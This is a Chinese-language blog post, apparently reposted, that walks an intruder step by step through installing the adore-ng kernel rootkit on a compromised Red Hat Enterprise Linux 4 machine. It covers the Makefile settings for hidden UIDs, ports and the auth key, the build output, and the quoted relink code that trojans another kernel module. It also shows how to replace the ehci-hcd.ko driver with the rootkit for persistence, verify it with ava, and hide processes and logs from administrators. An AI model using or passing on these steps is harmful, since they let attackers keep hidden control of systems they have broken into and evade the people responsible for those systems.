Linux最新内核级后门adore-ng使用详解

adore-ng是linux下内核级的后门,adore-ng是一款优秀的LKM rootkit,adore-ng目前最新版的是0.54，能够在2.4 -2.6内核下使用，并且稳定性十分好。下面我们通过一步步的演示来揭示它强大的功能.  以root身份登录目标机器,下载adore-ng到本地。。。。。

入侵者完全控制系统后，为方便下次进入而采用的一种技术。

一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性，能绕开系统日志，不易被系统管理员发现等特点。

现在找个linux的好后门确实不容易...就收藏了这篇文章给大家. 转载请注明  www.linuxso.com

前言：
kernel 2.6已经大步走入linux的世界，写后门的和用后门的也得跟上潮流。

简写约定：
fc:fedora core
rh:red hat
rhel4:red hat enterprise linux 4
sk:suckit
adore:adore-ng
rk:rootkit
lkm:loadable kernel modules

什么是adore-ng？
一个LKM rk,google adore会有很多详细的介绍。

为什么选择他？
1、我没弄到sk for 2.6的
2、fc2之后rh的内核默认就禁用了kmem了,sk无法inject the kernel on the fly，同时很多检查rk的程序也失效:)
3、adore是大牛Stealth写的，历史悠久，帮他测试的人N多，应该会比其他LKM稳定，LKM的稳定会严重的影响系统的稳定，所以选型我们必须要谨慎，就算功能再牛，玩一下就把系统挂了，还被别人发现了，那就得不尝失了。

看看功能：
[root@RHEL4 adore-ng]# cat FEATURES

If you never used adore before, here’s a list of supported
things:

o runs on kernel 2.4.x UP and SMP systems
o runs on kernel 2.6.x UP and SMP systems, i386 and x86_64 archs tested
o file and directory hiding
o process hiding
o socket-hiding (no matter whether LISTENing, CONNECTED etc)
o full-capability back door
o does not utilize sys_call_table but VFS layer
o KISS principle, to have as less things in there as possible
but also being as much powerful as possible
o hides itself from /proc and /sys filesystems

o syslog filtering: logs generated by hidden processes never appear
on the syslog UNIX socket anymore
o wtmp/utmp/lastlog filtering: writing of xtmp entries by hidden processes
do not appear in the file, except you force it by using special hidden
AND authenticated process (a sshd back door is usually only hidden thus
xtmp entries written by sshd don’t make it to disk)
o (optional) relinking of LKMs as described in phrack #61 aka LKM infection
to make it possible to be automatically reloaded after reboots (2.4 and 2.6)
本文环境：
真实机器非虚拟机
[root@RHEL4 adore-ng]# uname -a; cat /etc/redhat-release
linux RHEL4 2.6.9-5.EL #1 Wed Jan 5 19:22:18 EST 2005 i686 athlon i386 GNU/linux
Red Hat Enterprise linux AS release 4 (Nahant)

下载：
google adore-ng
或者可以在素包子的网站 http://baoz.net找找。

编辑和编译：
[root@RHEL4 adore-ng]# mv Makefile.2.6 Makefile

然后编辑下面的内容
EXTRA_CFLAGS=-DELITE_UID=2618748389U -DELITE_GID=4063569279U
EXTRA_CFLAGS+=-DCURRENT_ADORE=54
EXTRA_CFLAGS+=-DADORE_KEY=”fgjgggfd”

这个是隐藏的TCP端口，最后的0不要动。
u_short HIDDEN_SERVICES[] =
{2222, 7350, 0};
如果你是SMP的机器，就把下面打开。
EXTRA_CFLAGS+=-D__SMP__

设置你内核代码的位置
KERNEL_SOURCE=/usr/src/linux

OK，保存退出，make

[root@RHEL4 adore-ng]# make
cc -DELITE_UID=2648745389U -DELITE_GID=6063589279U -DCURRENT_ADORE=54 -DADORE_KEY=”djksdfnvn” -DHIDE ava.c libinvisible.c -o ava
ava.c:47: warning: integer constant is too large for “unsigned long” type
ava.c:47: warning: large integer implicitly truncated to unsigned type
libinvisible.c: In function `adore_hidefile’:
libinvisible.c:76: warning: integer constant is too large for “unsigned long” type
libinvisible.c:76: warning: large integer implicitly truncated to unsigned type
make -C /usr/src/linux SUBDIRS=`pwd` modules
make[1]: Entering directory `/usr/src/kernels/2.6.9-5.EL-i686′
CC [M] /root/adore-ng/adore-ng-2.6.o
/root/adore-ng/adore-ng-2.6.c:56: warning: `MODULE_PARM_’ is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c:59: warning: `MODULE_PARM_’ is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c:61: warning: `MODULE_PARM_’ is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c: In function `adore_opt_filldir’:
/root/adore-ng/adore-ng-2.6.c:281: warning: integer constant is too large for “unsigned long” type
/root/adore-ng/adore-ng-2.6.c:281: warning: comparison is always false due to limited range of data type
/root/adore-ng/adore-ng-2.6.c: In function `adore_root_filldir’:
/root/adore-ng/adore-ng-2.6.c:363: warning: integer constant is too large for “unsigned long” type
/root/adore-ng/adore-ng-2.6.c:363: warning: comparison is always false due to limited range of data type
Building modules, stage 2.
MODPOST
CC      /root/adore-ng/adore-ng-2.6.mod.o
LD [M] /root/adore-ng/adore-ng-2.6.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.9-5.EL-i686′
cc -O2 symsed.c -o symsed

说一下他的relink，就是把adore插到别的模块去的功能，我们看看他做了啥
system(“cp $lkm_path t.ko”);
system(“./symsed t.ko zero;ld -r adore-ng-2.6.ko t.ko -o z.ko; rm -f t.ko”);
print “nCopy trojaned LKM back to original LKM? (y/n)n”;

while ($yn !~ /^(y|n)$/i) {
$yn = ;
$yn =~ s/n//;
}

if ($yn =~ /y/i) {
system(“cp z.ko $lkm_path”);
} else {
print “nOutput LKM is z.kon”;
}
我在RHEL4下插入模块后模块都无法启动，不过没关系，我们不插入，我们替换:)
只有十分少数人是安装了系统后modprobe -r的，所以我们可以很容易的替换一些系统不十分需要的模块，我们看看我的模块
[root@RHEL4 adore-ng]# lsmod
Module                  Size Used by
dm_mod                 54741 0
ohci_hcd               21713 0
snd_intel8×0           33769 0
snd_ac97_codec         63889 1 snd_intel8×0
snd_pcm_oss            49017 0
snd_mixer_oss          17985 1 snd_pcm_oss
snd_pcm                96841 2 snd_intel8×0,snd_pcm_oss
snd_timer              29893 1 snd_pcm
snd_page_alloc          9673 2 snd_intel8×0,snd_pcm
snd_mpu401_uart         8769 1 snd_intel8×0
snd_rawmidi            26597 1 snd_mpu401_uart
snd_seq_device          8137 1 snd_rawmidi
snd                    54949 9

snd_intel8×0,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device
soundcore               9889 1 snd
sis900                 18756 0
ext3                  116809 1
jbd                    71257 1 ext3

我们选一个 Used By是0而且不怎么用的模块，比如usb的驱动，呵呵
ehci_hcd刚才已经被我用了，所以这里看不到，我们还可以用ohci_hcd或者是声卡的模块。

看看他在哪
[root@RHEL4 adore-ng]# modprobe -l | grep ehci
/lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko

卸了他
[root@RHEL4 adore-ng]# modprobe -r ehci-hcd
替换他
[root@RHEL4 adore-ng]# cp adore-ng-2.6.ko /lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko
加载他
[root@RHEL4 adore-ng]# modprobe ehci-hcd
检查他
[root@RHEL4 adore-ng]# ./ava I
Checking for adore 0.12 or higher …
Adore 1.54 installed. Good luck.

ELITE_UID: 2648745389, ELITE_GID=1768621983, ADORE_KEY=djksdfnvn CURRENT_ADORE=54

纰漏：
如果对方使用了tripwire(RHEL4默认安装了)，那么对ehci-hcd.ko的替换就很容易暴露，不过也没办法，就算relink模块一样是会暴露的，呵呵

疑问：
1、Hidden ports (adore-ng.h) go decimal, i.e. ‘2222′ hides everything which belongs to port
2222.
这句话我理解是，同时隐藏和2222端口有关系的进程，呵呵，可能我对他的everything理解错了吧 :)
[root@RHEL4 ~]# nc -vvnlp 2222
listening on [any] 2222 …

[root@RHEL4 adore-ng]# ps aux | grep 2222
root      1938 0.0 0.1 1724 496 pts/1    S+   13:34   0:00 nc -vvnlp 2222
root      1941 0.0 0.1 5304 684 pts/0    S+   13:36   0:00 grep 2222
2、[root@RHEL4 adore-ng]# grep full-capability FEATURES
o full-capability back door
这个有点忽悠人，这个backdoor分明就是一个localroot，我个人觉得localroot不叫backdoor
[root@RHEL4 adore-ng]# ./ava | grep root
r execute as root